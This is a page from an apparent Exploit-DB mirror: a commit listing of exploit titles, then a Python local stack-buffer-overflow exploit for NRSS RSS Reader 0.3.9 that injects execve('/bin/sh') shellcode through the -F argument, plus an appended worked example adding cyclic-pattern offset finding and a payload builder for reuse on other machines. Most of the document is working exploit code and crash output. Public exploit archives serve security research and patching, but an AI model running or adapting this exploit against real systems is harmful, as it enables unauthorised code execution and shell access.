exploit-db-mirror/platforms/linux/local/39810.py
Offensive Security 5e229672a0 DB: 2016-05-14
3 new exploits

Ethereal / tcpdump (rsvp_print) Infinite Loop Denial of Service Exploit
Ethereal 0.10.10 / tcpdump 3.9.1 (rsvp_print) Infinite Loop Denial of Service Exploit

Mozilla Firefox - Install Method Remote Arbitrary Code Execution Exploit
Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit

Active Price Comparison 4 - (ProductID) Blind SQL Injection Vulnerability

Absolute Form Processor XE-V 1.5 - (auth Bypass) SQL Injection Vulnerability

ipsec-tools racoon frag-isakmp Denial of Service PoC
IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service PoC
PaoBacheca Guestbook 2.1 (login_ok) Auth Bypass Vulnerability
PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability
PaoBacheca Guestbook 2.1 - (login_ok) Auth Bypass Vulnerability
PaoLiber 1.1 - (login_ok) Authentication Bypass Vulnerability
IPsec-Tools < 0.7.2 - Multiple Remote Denial of Service Vulnerabilities
ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability

I-net Multi User Email Script SQLi Vulnerability

linux/x86 - break chroot execve /bin/sh 80 bytes
linux/x86 - break chroot execve /bin/sh (80 bytes)

Sysax Multi Server 5.64 - Create Folder Buffer Overflow

TikiWiki Project 1.8 tiki-read_article.php articleId Parameter XSS
TikiWiki Project 1.8 - tiki-read_article.php articleId Parameter XSS

TikiWiki Project 1.8 tiki-print_article.php articleId Parameter XSS
TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter XSS
TikiWiki Project 1.8 tiki-list_faqs.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - tiki-list_faqs.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - tiki-list_trackers.php sort_mode Parameter SQL Injection
UBBCentral UBB.threads 6.2.3/6.5 login.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 online.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter XSS

CityPost PHP Image Editor M1 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M2 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M3 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor Imgsrc URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M4 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting Vulnerability
osCommerce 2.2 admin/countries.php page Parameter XSS
osCommerce 2.2 admin/currencies.php page Parameter XSS
osCommerce 2.2 - admin/countries.php page Parameter XSS
osCommerce 2.2 - admin/currencies.php page Parameter XSS
Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1)
Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2)
Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (1)
Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (2)

Joomla Gallery WD - SQL Injection Vulnerability

Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities
Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities
Photoshop CC2014 and Bridge CC 2014 - .PNG Parsing Memory Corruption Vulnerabilities
NRSS Reader 0.3.9 - Local Stack-Based Overflow
runAV mod_security - Arbitrary Command Execution
Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read
2016-05-14 05:03:47 +00:00


# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: NRSS RSS Reader
# Version: 0.3.9-1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: NRSS is a console based RSS reader allowing
# users to read and manage RSS feeds
# Kali Linux 2.0 package: pool/main/n/nrss/nrss_0.3.9-1_i386.deb
# MD5sum: 27d997c89340ebb6f4a1d9e1eb28ea39
# Website: http://www.codezen.org/nrss/
#
# An over-long -F argument overwrites the saved registers and the return
# address on the stack: 256 bytes reach the saved EIP, and the next 4 bytes
# ("DCBA", 0x41424344 little-endian) become the instruction pointer:
#
# gdb$ run -F $(python -c 'print "A"*256+"DCBA"')
# Starting program: /usr/bin/nrss -F $(python -c 'print "A"*256+"DCBA"')
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000000 EBX: 0x41414141 ECX: 0x00000000 EDX: 0x0809040C o d I t S z a p c
# ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFED60 EIP: 0x41424344
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
# Error while running hook_stop:
# Cannot access memory at address 0x41424344
# 0x41424344 in ?? ()
import errno
import os
import subprocess
import sys


def run():
    try:
        print("# NRSS News Reader - Stack Buffer Overflow by Juan Sacco")
        print("# This Exploit has been developed using Exploit Pack")
        # Layout: NOPSLED + SHELLCODE + EIP. The first 256 bytes fill the
        # buffer and the saved registers; the next 4 bytes overwrite the
        # saved return address (see the gdb session above).
        buffersize = 256
        # execve("/bin//sh") shellcode; contains no NUL byte, which matters
        # because the payload is passed through argv as a C string.
        shellcode = b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
        # 0xbfffecd0: hard-coded stack address inside the NOP sled for the
        # gdb layout above (no ASLR, executable stack on the tested Kali
        # 2.0 x86 build). A different environment/argv size shifts the stack.
        eip = b"\xd0\xec\xff\xbf"
        nopsled = b"\x90" * (buffersize - len(shellcode))
        buffer = nopsled + shellcode + eip
        # Program, flag and payload must be separate argv elements.
        subprocess.call([b"nrss", b"-F", buffer])
    except OSError as e:
        if e.errno == errno.ENOENT:
            print("Sorry, NRSS Reader - Not found!")
        else:
            print("Error executing exploit")
            raise


def howtousage():
    print("Snap! Something went wrong")
    sys.exit(-1)


if __name__ == '__main__':
    try:
        print("Exploit NRSS Reader v0.3.9-1 Local Overflow Exploit")
        print("Author: Juan Sacco - Exploit Pack")
    except IndexError:
        howtousage()
    run()
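The exploit above hard-codes the 256-byte distance to the saved return address after finding it with a "DCBA" sentinel in gdb. The following is an added worked example, not part of the original exploit or of Exploit Pack: it shows the sentinel-to-EIP mapping the gdb dump relies on, generalises the sentinel to a Metasploit-style cyclic pattern so the offset can be read straight from a crashed EIP value, and builds the NOPSLED + SHELLCODE + EIP payload with a layout check. The offset 256, the shellcode and the return address 0xbfffecd0 are taken from the page; the target is assumed to be the same no-ASLR, executable-stack Kali 2.0 x86 setup the header describes. The crashed EIP value fed to the offset finder is constructed here from the pattern itself, standing in for what gdb would print.

```python
import struct

# Assumptions (from the page, not verified here): the saved return address
# sits 256 bytes into the -F argument, and 0xbfffecd0 lands in the NOP sled.
EIP_OFFSET = 256
RET_ADDR = 0xbfffecd0
# execve("/bin//sh") shellcode from the exploit above; no NUL bytes.
SHELLCODE = b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"


def sentinel_to_eip(sentinel):
    """EIP value a 4-byte sentinel produces on little-endian x86.

    b"DCBA" -> 0x41424344, matching the gdb register dump on the page.
    """
    return struct.unpack("<I", sentinel[:4])[0]


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). The standard 20280-byte
    pattern has no repeated 4-byte window, so a crashed EIP maps to one offset."""
    out = bytearray()
    for a in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for b in b"abcdefghijklmnopqrstuvwxyz":
            for c in b"0123456789":
                out += bytes((a, b, c))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, eip_value):
    """Offset of the bytes that ended up in EIP, i.e. the distance from the
    start of the argument to the saved return address."""
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value 0x%08x not found in pattern" % eip_value)
    return idx


def argv_safe(payload):
    """The payload travels through argv as a C string: a NUL byte truncates it."""
    return b"\x00" not in payload


def build_payload(ret_addr=RET_ADDR, shellcode=SHELLCODE, offset=EIP_OFFSET):
    """NOPSLED + SHELLCODE padded to exactly `offset` bytes, then the return
    address little-endian, so the sled fills the buffer and ret_addr
    overwrites the saved EIP."""
    if len(shellcode) > offset:
        raise ValueError("shellcode (%d bytes) does not fit in %d bytes"
                         % (len(shellcode), offset))
    payload = b"\x90" * (offset - len(shellcode)) + shellcode + struct.pack("<I", ret_addr)
    if not argv_safe(payload):
        raise ValueError("payload contains a NUL byte; argv would truncate it")
    return payload


if __name__ == "__main__":
    # Step 1: crash with a cyclic pattern instead of "A"*256 and read EIP in gdb.
    pattern = pattern_create(300)
    # Constructed stand-in for the EIP gdb would report for this pattern.
    crashed_eip = sentinel_to_eip(pattern[EIP_OFFSET:EIP_OFFSET + 4])
    print("EIP 0x%08x -> offset %d" % (crashed_eip, pattern_offset(pattern, crashed_eip)))
    # Step 2: the page's own sentinel run, for comparison.
    print("DCBA -> EIP 0x%08x" % sentinel_to_eip(b"DCBA"))
    # Step 3: build the real payload and check its layout; pass it as
    # subprocess.call([b"nrss", b"-F", p]) exactly as the exploit does.
    p = build_payload()
    print("payload %d bytes, ret=0x%08x" % (len(p), struct.unpack("<I", p[-4:])[0]))
```

If the hard-coded return address misses the sled on another machine, `build_payload` accepts a different `ret_addr`; `argv_safe` rejects any address or shellcode containing 0x00, which the argv transport cannot carry.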